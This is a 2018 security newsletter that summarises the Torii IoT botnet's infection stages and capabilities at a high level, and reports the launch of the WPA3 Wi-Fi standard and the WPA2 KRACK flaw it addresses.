19th Ave New York, NY 95822, USA

INSIGHT WEEKLY SECURITY NEWS LETTER-03-OCT-2018

A New Sophisticated IOT Botnet Attack – Torii

Most Sophisticated Torii Botnet discovered that spreading with more advanced techniques than famous Mirai Botnet but different than Mirai functionality.

Malware Authors developed Torii botnet with more stealthy and persistence capabilities unlike other botnets it doesn’t perform attacks such as DDOS or other attacks such take down the connected devices.

Impact:

This will compromise the victim’s network and steal the sensitive information and execute the command in order to perform various malicious activities through strong layered communication.

Targeted Platform:

Torii botnet will support a wide range of target architectures, including MIPS, ARM, x86, x64, PowerPC, SuperH, etc.

Botnet Infection Process:

Attack process starts by executing the Shellscript which is more sophisticated than normal botnets via telnet attack on the weak credentials.

It will trying to find out the architecture of the target by attempts to download payload for that device, interestingly Torii supports various device architectures including on x86_64, x86, ARM, MIPS, Motorola 68k, SuperH, PPC .

Mainly it attempts to compromise wide range of common architecture based IoT devices and it used to download many binary payloads using several commands.

Torii Botnet using a bash script in order to redirect the infected victims device into malware hosted server.

The malware find out the architecture of the target device it downloads and executes the appropriate binary from the server and the payload will perform only to download the second level of payload.

  • First and second stage of payload using XOR-based encryption
  • The second stage of the payload main contains the bot future that will communicate with its command & control server to execute the command.
  • It has some futures such as anti-debugging techniques, data exfiltration, multi-level encryption of communication and many other evasion techniques.

It’s important to remember that once the target device receives the payload, it stops connecting to the download server and connects to the CnC serve to get connect and perform based on it.

Reference:    https://gbhackers.com/torii-botnet/


New Wireless Security Feature – WPA 3 has Launched

 WPA3—the next-generation Wi-Fi security standard that promises to eliminate all the known security vulnerabilities and wireless attacks that are up today including the dangerous KRACK attacks.

 WPA or Wi-Fi Protected Access, is a standard designed to authenticate wireless devices using the Advanced Encryption Standard (AES) protocol and is intended to prevent hackers from eavesdropping on your wireless data.

Current Flaws & Impact in WPA2 Protocol

A severe flaw in the current WPA2 protocol – KRACK (Key Reinstallation Attack).It is possible for attackers to intercept, decrypt and even manipulate WiFi network traffic.

Most device manufacturers patched their devices against KRACK attacks, the WiFi Alliance, without much delay, rushed to finalize and launch WPA3 in order to address WPA2’s technical shortcomings from the ground.

What New Security Features WPA3 Offers?

WPA3 security standard will replace the existing WPA2 that has been around for at least 15 years and widely used by billions of devices every day.

  • The new security protocol provides some big improvements for Wi-Fi enabled devices in terms of configuration, authentication, and encryption enhancements.
  • It is making harder for hackers to hack your Wi-Fi or eavesdrop on your network.
  • The Wi-Fi Alliance launched two flavors of latest security protocol—WPA3-Personal and WPA3-Enterprise—for personal, enterprise, and IoT wireless networks.

key features 

Protection Against Brute-Force Attacks – enhanced protection against offline brute-force dictionary attacks to crack wi-fi password.

  • Forward Secrecy – WPA3 leverages SAE (Simultaneous Authentication of Equals) handshake to offer forward secrecy to prevent from attackers to decrypt old captured traffic, even if the learn password too.
  • Protecting Public / Open Wi-Fi Network – WPA3 strengthens user privacy in open networks through individualized data encryption between device and access point to mitigate Man-in-the-middle attack.
  • Strong Encryption for Critical Networks – By using WPA3 Enterprise, critical Wi-Fi networks handling sensitive information (such as government, and industrial organizations), can protect Wi-Fi connections with 192-bit encryption.WPA3 is set to roll out later this year and is expected to hit mass adoption in late 2019, when it eventually become a requirement for devices to be considered Wi-Fi certified, according to the WiFi Alliance.


Reference:   
https://thehackernews.com/2018/06/wpa3-wifi-security-standard.html

 

For more details: Managed Network Services

Leave a comment